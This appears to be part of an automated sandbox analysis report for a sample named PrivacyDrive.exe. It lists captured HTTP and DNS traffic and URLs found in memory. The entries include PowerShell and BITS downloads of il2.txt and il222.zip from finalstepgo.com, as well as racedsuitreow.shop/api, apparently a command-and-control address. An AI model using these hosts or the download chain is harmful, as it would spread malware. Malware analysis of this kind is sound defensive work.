FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FCX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/CYGXBN1kkA_ojDY5vKbCoG4Zy0E.css?bu=C7wJmAO6BJgK_QjnCO0GWlpaWg&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/eNojzGTgc6FFJi_kGAzzghOMEG4.css?bu=B8ECRa8ClwFaWswC&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic HTTP traffic detected: GET /rb/3F/ortl,cc,nc/4-xJy3tX6bM2BGl5zKioiEcQ1TU.css?bu=A4gCjAKPAg&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic HTTP traffic detected: GET /rb/6j/cir3,ortl,cc,nc/_McBPQ_9mTftkbN3lEsLB5a8qvg.css?bu=MsIKvArICrwKrAu8CrILvAq8Cr0LvArEC7wKygu8CtALvArWC7wK2gq8CuAKvArUCrwKvAqjC7wK7wq8CvUKvArpCrwKvAqFC4gLvAq8CqALjgu8CpQLlwu8Cv8LvArcC7wKrQw&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic HTTP traffic detected: GET /rb/6j/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AbwK&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?e3bfee56476065f0ab149b748f731e37 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: p-ring.msedge.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rb/6j/ortl,cc,nc/_BjeFNPDJ-N9umMValublyrbq4Y.css?bu=CZoMvAqfDLwKowy8CrwKvAq8Cg&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?abf6b0b4363a8fb8ec7d6cce4a4b9cc3 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: p-ring.msedge.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uploads/il2.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: finalstepgo.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uploads/il222.zip HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 26 Sep 2024 14:09:59 GMTUser-Agent: Microsoft BITS/7.8Host: finalstepgo.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SBWgPo8m6MLKgX2&MD=VCxfKomC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: chromecache_184.1.dr, chromecache_219.1.dr String found in binary or memory: ()=>{this.close()});bo(this.g,"ddl-share-facebook",()=>{var g=kj(hj("facebook_link",null)||lj(d));if(!mj()){g=Vn(g);var h={app_id:"738026486351791",href:g,hashtag:"#GoogleDoodle"};g=new wg;for(var k in h)g.add(k,h[k]);k=new qg("https://www.facebook.com/dialog/share");tg(k,g);fg(k.toString());yl(5)}});bo(this.g,"ddl-share-twitter",()=>{var g=kj(hj("twitter_link",null)||lj(d));mj()||(g=Vn(g),g="text="+encodeURIComponent(b+"\n"+g),fg("http://twitter.com/intent/tweet?"+g),yl(6))});bo(this.g,"ddl-modal-copy-link-container", equals www.facebook.com (Facebook)
Source: chromecache_184.1.dr, chromecache_219.1.dr String found in binary or memory: ()=>{this.close()});bo(this.g,"ddl-share-facebook",()=>{var g=kj(hj("facebook_link",null)||lj(d));if(!mj()){g=Vn(g);var h={app_id:"738026486351791",href:g,hashtag:"#GoogleDoodle"};g=new wg;for(var k in h)g.add(k,h[k]);k=new qg("https://www.facebook.com/dialog/share");tg(k,g);fg(k.toString());yl(5)}});bo(this.g,"ddl-share-twitter",()=>{var g=kj(hj("twitter_link",null)||lj(d));mj()||(g=Vn(g),g="text="+encodeURIComponent(b+"\n"+g),fg("http://twitter.com/intent/tweet?"+g),yl(6))});bo(this.g,"ddl-modal-copy-link-container", equals www.twitter.com (Twitter)
Source: global traffic DNS traffic detected: DNS query: google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: csp.withgoogle.com
Source: global traffic DNS traffic detected: DNS query: ogs.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: finalstepgo.com
Source: global traffic DNS traffic detected: DNS query: candleduseiwo.shop
Source: global traffic DNS traffic detected: DNS query: racedsuitreow.shop
Source: unknown HTTP traffic detected: POST /gen_204?s=webhp&t=cap&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,cbt.97,hst.35&opi=89978449&ts=300 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"Content-Type: text/plain;charset=UTF-8sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.google.comX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://crl.thawte.com/ThawtePremiumServerCA.crl0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://ocsp.thawte.com0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://s.symcd.com06
Source: chromecache_200.1.dr String found in binary or memory: http://schema.org/WebPage
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://t2.symcb.com0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://tl.symcd.com0&
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: PrivacyDrive.exe.15.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: chromecache_214.1.dr, chromecache_204.1.dr String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: http://www.broofa.com
Source: chromecache_184.1.dr, chromecache_219.1.dr String found in binary or memory: http://www.google.com/doodles/_SHARE?description=
Source: chromecache_200.1.dr String found in binary or memory: http://www.google.com/doodles/celebrating-popcorn?hl=en
Source: chromecache_184.1.dr, chromecache_219.1.dr String found in binary or memory: http://www.gphysics.com
Source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr String found in binary or memory: http://www.privacy-drive.comx
Source: chromecache_217.1.dr, chromecache_207.1.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_217.1.dr, chromecache_207.1.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_234.1.dr String found in binary or memory: https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_si_001_p%26continue%3Dhttps%25
Source: chromecache_231.1.dr, chromecache_217.1.dr, chromecache_207.1.dr, chromecache_226.1.dr, chromecache_200.1.dr String found in binary or memory: https://apis.google.com
Source: chromecache_225.1.dr, chromecache_220.1.dr String found in binary or memory: https://apis.google.com/js/api.js
Source: chromecache_238.1.dr, chromecache_221.1.dr String found in binary or memory: https://cda-push-dev.sandbox.googleapis.com/upload/
Source: chromecache_217.1.dr, chromecache_207.1.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_221.1.dr String found in binary or memory: https://content-push.googleapis.com/upload/
Source: chromecache_217.1.dr, chromecache_207.1.dr String found in binary or memory: https://content.googleapis.com
Source: chromecache_242.1.dr, chromecache_217.1.dr, chromecache_207.1.dr, chromecache_193.1.dr String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: PrivacyDrive.exe.15.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: PrivacyDrive.exe.15.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: chromecache_217.1.dr, chromecache_207.1.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_238.1.dr, chromecache_221.1.dr String found in binary or memory: https://embeddedassistant-webchannel.googleapis.com/google.assistant.embedded.v1.EmbeddedAssistant/A
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.google.com/license/googlerestricted
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8E-mKpNk.
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8EemK.wof
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3OwyL8H-mKpNk.
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v61/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RF
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qE52i1dC.woff2)
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qER2i1dC.woff2)
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEV2i1dC.woff2)
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEl2i1dC.woff2)
Source: chromecache_227.1.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2)
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chromecache_200.1.dr String found in binary or memory: https://issues.chromium.org/issues/40757070).
Source: chromecache_242.1.dr, chromecache_193.1.dr String found in binary or memory: https://lens.google.com
Source: chromecache_238.1.dr, chromecache_221.1.dr String found in binary or memory: https://lens.google.com/gen204
Source: chromecache_200.1.dr String found in binary or memory: https://ogads-pa.googleapis.com
Source: chromecache_234.1.dr String found in binary or memory: https://ogs.google.com/
Source: chromecache_200.1.dr String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chromecache_234.1.dr String found in binary or memory: https://ogs.google.com/widget/callout
Source: chromecache_200.1.dr String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chromecache_200.1.dr String found in binary or memory: https://ogs.google.com/widget/callout?prid=19037050
Source: chromecache_229.1.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_207.1.dr String found in binary or memory: https://plus.google.com
Source: chromecache_217.1.dr, chromecache_207.1.dr String found in binary or memory: https://plus.googleapis.com
Source: chromecache_238.1.dr, chromecache_221.1.dr String found in binary or memory: https://push.clients6.google.com/upload/
Source: PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/
Source: PrivacyDrive.exe, 00000010.00000002.1579442171.0000000001732000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1536061010.000000000172F000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000002.1578947957.0000000001700000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api
Source: PrivacyDrive.exe, 00000010.00000002.1578947957.0000000001700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api9
Source: PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/u
Source: chromecache_234.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: chromecache_224.1.dr, chromecache_199.1.dr String found in binary or memory: https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)
Source: chromecache_224.1.dr, chromecache_199.1.dr String found in binary or memory: https://ssl.gstatic.com/images/icons/material/system/1x/done_white_16dp.png)
Source: chromecache_224.1.dr, chromecache_199.1.dr String found in binary or memory: https://ssl.gstatic.com/ui/v1/menu/checkmark2-light.png)
Source: chromecache_224.1.dr, chromecache_199.1.dr String found in binary or memory: https://ssl.gstatic.com/ui/v1/menu/checkmark2.png)
Source: chromecache_238.1.dr, chromecache_221.1.dr String found in binary or memory: https://support.google.com/
Source: chromecache_242.1.dr, chromecache_193.1.dr String found in binary or memory: https://support.google.com/websearch/answer/106230
Source: chromecache_225.1.dr, chromecache_242.1.dr, chromecache_193.1.dr, chromecache_220.1.dr String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: chromecache_214.1.dr, chromecache_204.1.dr String found in binary or memory: https://use.typekit.net
Source: chromecache_217.1.dr, chromecache_207.1.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521221341.000000000171B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521221341.000000000171B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: PrivacyDrive.exe.15.dr String found in binary or memory: https://www.cybertronsoft.com
Source: chromecache_231.1.dr, chromecache_234.1.dr, chromecache_226.1.dr String found in binary or memory: https://www.google.com
Source: chromecache_234.1.dr String found in binary or memory: https://www.google.com"
Source: chromecache_200.1.dr String found in binary or memory: https://www.google.com/_/og/promos/
Source: chromecache_234.1.dr String found in binary or memory: https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png
Source: chromecache_200.1.dr String found in binary or memory: https://www.google.com/intl/en/about/products
Source: chromecache_225.1.dr, chromecache_242.1.dr, chromecache_193.1.dr, chromecache_220.1.dr String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: chromecache_238.1.dr, chromecache_221.1.dr String found in binary or memory: https://www.google.com/tools/feedback
Source: chromecache_234.1.dr String found in binary or memory: https://www.google.com/url?q
Source: chromecache_200.1.dr String found in binary or memory: https://www.google.com/url?q=https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_s
Source: chromecache_219.1.dr String found in binary or memory: https://www.google.com/webhp
Source: chromecache_207.1.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_207.1.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_234.1.dr String found in binary or memory: https://www.gstatic.com
Source: chromecache_234.1.dr String found in binary or memory: https://www.gstatic.com/_/boq-one-google/_/r/
Source: chromecache_234.1.dr String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chromecache_226.1.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chromecache_231.1.dr, chromecache_226.1.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chromecache_200.1.dr String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.RRlsmNlDmQQ.2019.O/rt=j/m=qabr
Source: chromecache_200.1.dr String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.4FdvxZCaxZc.L.W.O/m=qcwid
Source: chromecache_221.1.dr String found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/
Source: PrivacyDrive.exe.15.dr String found in binary or memory: https://www.thawte.com/cps0
Source: PrivacyDrive.exe.15.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: PrivacyDrive.exe.15.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59824
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
